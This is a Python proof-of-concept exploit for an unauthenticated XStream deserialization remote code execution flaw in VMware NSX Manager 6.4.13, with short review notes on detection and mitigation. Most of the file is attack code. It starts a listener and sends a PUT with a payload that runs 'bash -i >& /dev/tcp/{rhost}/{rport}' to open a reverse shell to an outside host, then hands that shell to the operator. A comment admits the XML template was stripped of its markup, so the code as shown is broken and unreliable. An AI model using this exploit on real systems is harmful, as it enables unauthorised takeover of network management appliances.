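#!/usr/bin/env python3
"""
VMWare NSX Manager XStream Deserialization of Untrusted Data Remote Code Execution Vulnerability

Version: 6.4.13-19307994
File: VMware-NSX-Manager-6.4.13-19307994-disk1.vmdk
SHA1: f828eccd50d5f32500fb1f7a989d02bddf705c45
Found by: Sina Kheirkhah of MDSec and Steven Seeley of Source Incite

What this proof of concept does
-------------------------------
1. Starts a TCP listener on the connect-back port (default 1234).
2. Sends a single HTTPS PUT to ``/api/2.0/services/usermgmt/password/1337``
   on the target with ``Content-Type: application/xml``. The request carries
   no credentials or session headers. The body is the ``xstream`` template
   below, which the advisory title says is handed to XStream for
   deserialization.
3. Attaches the first inbound connection on the listener to the terminal.

Review notes (detection and mitigation)
---------------------------------------
* Root cause per the title: XML from the network is deserialized by XStream
  without restricting which types may be instantiated. The general fix is a
  vendor-patched build plus an XStream type allowlist. Consult the vendor
  advisory for the fixed release, which this page does not state.
* Network/log signal: PUT requests with an XML body to
  ``/api/2.0/services/usermgmt/password/<id>`` from hosts that do not normally
  administer the manager.
* Host signal: the template names ``bash -c`` and ``/dev/tcp``. On the
  appliance this would presumably appear as a ``bash`` child of the manager's
  Java process opening an outbound TCP connection. Confirm against process
  telemetry.
* Exposure reduction: keep the management API reachable only from
  administrative networks, and deny outbound connections from the appliance
  by default.
"""
import socket
import sys
import requests
# NOTE: telnetlib was deprecated in Python 3.11 and removed in 3.13 (PEP 594).
from telnetlib import Telnet
from threading import Thread
from urllib3 import disable_warnings, exceptions

# The request below is sent with verify=False (no TLS certificate validation);
# this silences the resulting InsecureRequestWarning for the whole process.
disable_warnings(exceptions.InsecureRequestWarning)

# NOTE(review): the XML element markup of this template was lost when the page
# was extracted; only the text nodes remain, so the string is not a well-formed
# XStream document. It is kept exactly as it appears on the page.
# {rhost} and {rport} are filled in with str.format() before sending.
xstream = """ foo java.lang.Comparable bash -c bash -i >& /dev/tcp/{rhost}/{rport} 0>&1 start """


def handler(lp):
    """Accept one TCP connection on port ``lp`` and bridge it to the terminal.

    Args:
        lp: Local TCP port to listen on.

    The listener binds to all interfaces (0.0.0.0) and accepts the first
    connection without checking who the peer is, so whichever host connects
    first is treated as the session. Both sockets are closed when the
    function returns.
    """
    print(f"(+) starting handler on port {lp}")
    t = Telnet()
    # Context managers release the sockets even if accept()/interact() raises.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("0.0.0.0", lp))
        s.listen(1)
        conn, addr = s.accept()
    with conn:
        print(f"(+) connection from {addr[0]}")
        t.sock = conn
        print("(+) pop thy shell!")
        t.interact()


if __name__ == "__main__":
    if len(sys.argv) != 3:
        # The argument placeholders had been stripped from the usage line;
        # they are restored here from the example invocation below.
        print(f"(+) usage: {sys.argv[0]} <target> <connectback[:port]>")
        print(f"(+) eg: {sys.argv[0]} 192.168.18.135 172.18.182.204:1234")
        sys.exit(1)
    target = sys.argv[1]
    rhost = sys.argv[2]
    rport = 1234
    if ":" in sys.argv[2]:
        parts = sys.argv[2].split(":")
        rhost, port_text = parts[0], parts[1]
        # Explicit validation instead of `assert`, which is stripped under
        # `python -O`; also rejects values outside the TCP port range.
        if not (port_text.isdecimal() and int(port_text) <= 65535):
            sys.exit("(-) didnt supply a valid port")
        rport = int(port_text)
    handlerthr = Thread(target=handler, args=[rport])
    handlerthr.start()
    # trigger rce
    requests.put(
        f"https://{target}/api/2.0/services/usermgmt/password/1337",
        data=xstream.format(rhost=rhost, rport=rport),
        headers={
            'Content-Type': 'application/xml'
        },
        verify=False
    )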